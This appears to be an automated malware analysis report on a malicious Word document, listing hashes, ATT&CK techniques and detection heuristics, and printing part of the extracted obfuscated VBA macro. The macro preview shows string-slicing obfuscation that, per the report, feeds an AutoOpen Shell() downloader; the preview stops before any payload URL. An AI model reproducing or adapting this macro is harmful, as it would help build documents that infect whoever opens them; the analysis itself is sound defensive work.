Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d6358a7e9ceb668b…

MALICIOUS

Office (OLE)

Size: 68.5 KB
Created: 2017-10-13 07:42:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: b88adcb78f36aea8fdea3fbdffeca800
SHA-1: acb17276be8482478851a90600f8e92ab85f23eb
SHA-256: d6358a7e9ceb668bb5693c27cd70f25fea9852b682993773a4ddf88bbddf7749
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro calls the Shell() function, a common technique for executing arbitrary commands, which strongly suggests that its purpose is to download and execute a secondary payload. The presence of an AutoOpen macro further indicates an attempt at automatic execution when the document is opened.

Heuristics (7)

  • ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)   | 5248 bytes
SHA-256: 73a40007541ff15a5ae72e55f1a7004ab187fe41ada5e9345dde554e8ef02c81
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub wLbFCCPIi()
wnwuLluFX = "" + iRiXtDH + nKEwAui + SNqEj + GEEDNZ + "coMments" + iRiXtDH + nKEwAui + SNqEj + GEEDNZ + wziKIkK + nrcvhIOr + HOTqIGXG + TLdTp + dXIjPwpa
uiYqkHO = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 7045), 146)
znmqJ = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 6326), 109)
fjqIjV = Right(Left((dQBriiALt(wnwuLluFX)), 2666), 53)
UHMARKZ = Right(Left((dQBriiALt(wnwuLluFX)), 9742), 43)
ruVHjBij = Right(Left((dQBriiALt(wnwuLluFX)), 3407), 132)
jTkAKUE = Mid((dQBriiALt(wnwuLluFX)), 2000, 63)
nFfZdEW = Mid((dQBriiALt(wnwuLluFX)), 9147, 101)
OjwaALzPKEw = Right(Left((dQBriiALt(wnwuLluFX)), 7481), 141)
YtDUAk = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 6222), 98)
fMGFz = Mid((dQBriiALt(wnwuLluFX)), 11103, 14)
UsDKYi = Right(Left((dQBriiALt(wnwuLluFX)), 1899), 120)
VFSZBv = Mid((dQBriiALt(wnwuLluFX)), 7621, 24)
Fpbhm = Mid((dQBriiALt(wnwuLluFX)), 11909, 111)
ElVuiT = Right(Left((dQBriiALt(wnwuLluFX)), 5743), 61)
BpnuSAn = Right(Left((dQBriiALt(wnwuLluFX)), 5978), 100)
CihPhLFF = Mid((dQBriiALt(wnwuLluFX)), 3862, 78)
AQXoZw = Mid((dQBriiALt(wnwuLluFX)), 8567, 125)
ZDomrfkRkNA = Right(Left((dQBriiALt(wnwuLluFX)), 6927), 129)
RjziDotXaQo = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 8999), 6)
pFiAOw = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 5006), 129)
OCoPr = Right(Left((dQBriiALt(wnwuLluFX)), 4708), 112)
PbrEiMijY = Right(Left((dQBriiALt(wnwuLluFX)), 9923), 110)
JqbwmAa = Mid((dQBriiALt(wnwuLluFX)), 137, 101)
imjzEIwCjK = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 10452), 96)
nNHzZj = Mid((dQBriiALt(wnwuLluFX)), 10156, 65)
HYGpsmraQQn = Mid((dQBriiALt(wnwuLluFX)), 2141, 134)
MAdrsA = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 6990), 36)
fzNwJW = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 1364), 59)
wNRsohF = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 6097), 43)
GSRYmQXYDaN = Mid((dQBriiALt(wnwuLluFX)), 4831, 75)
jjMhcZ = Right(Left((dQBriiALt(wnwuLluFX)), 1278), 35)
iPOFRCWzTiu = Right(Left((dQBriiALt(wnwuLluFX)), 11895), 115)
mhEpsjpXGvP = Right(Left((dQBriiALt(wnwuLluFX)), 7910), 29)
aWoRMYO = uiYqkHO + znmqJ + fjqIjV + UHMARKZ + ruVHjBij + jTkAKUE + nFfZdEW + OjwaALzPKEw + YtDUAk + fMGFz + UsDKYi + VFSZBv + Fpbhm + ElVuiT + BpnuSAn + CihPhLFF + AQXoZw + ZDomrfkRkNA + RjziDotXaQo + pFiAOw + OCoPr + PbrEiMijY + JqbwmAa + imjzEIwCjK + nNHzZj + HYGpsmraQQn + MAdrsA + fzNwJW + wNRsohF + GSRYmQXYDaN + jjMhcZ + iPOFRCWzTiu + mhEpsjpXGvP
iBXXVov = Right(Left((dQBriiALt(wnwuLluFX)), 9128), 52)
wIfmjXPVpki = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 9311), 117)
DDurMJXYE = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 2827), 148)
iWGUMVO = Right(Left((dQBriiALt(wnwuLluFX)), 8143), 100)
VCHvj = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 304), 72)
zDYYRUwwUdd = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 1069), 79)
JRvIUV = aWoRMYO + iBXXVov + wIfmjXPVpki + DDurMJXYE + iWGUMVO + VCHvj + zDYYRUwwUdd
BwwIEP = Right(Left((dQBriiALt(wnwuLluFX)), 11608), 147)
fAwJaHA = Mid((dQBriiALt(wnwuLluFX)), 10429, 9)
lnHuJYjawc = Mid((dQBriiALt(wnwuLluFX)), 4219, 80)
DCMjiwYiVYW = Right(Left((dQBriiALt(wnwuLluFX)), 1632), 70)
iJuZdjQjSsX = JRvIUV + BwwIEP + fAwJaHA + lnHuJYjawc + DCMjiwYiVYW
mWacw = Right(Left((dQBriiALt(wnwuLluFX)), 10804), 96)
rLcEWNRh = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 7665), 5)
pPbPTHUaSwA = Right(Left((dQBriiALt(wnwuLluFX)), 8293), 134)
AMnSk = Right(Left((dQBriiALt(wnwuLluFX)), 9603), 20)
kjfWrwSVH = Mid((dQBriiALt(wnwuLluFX)), 9672, 1)
... (truncated)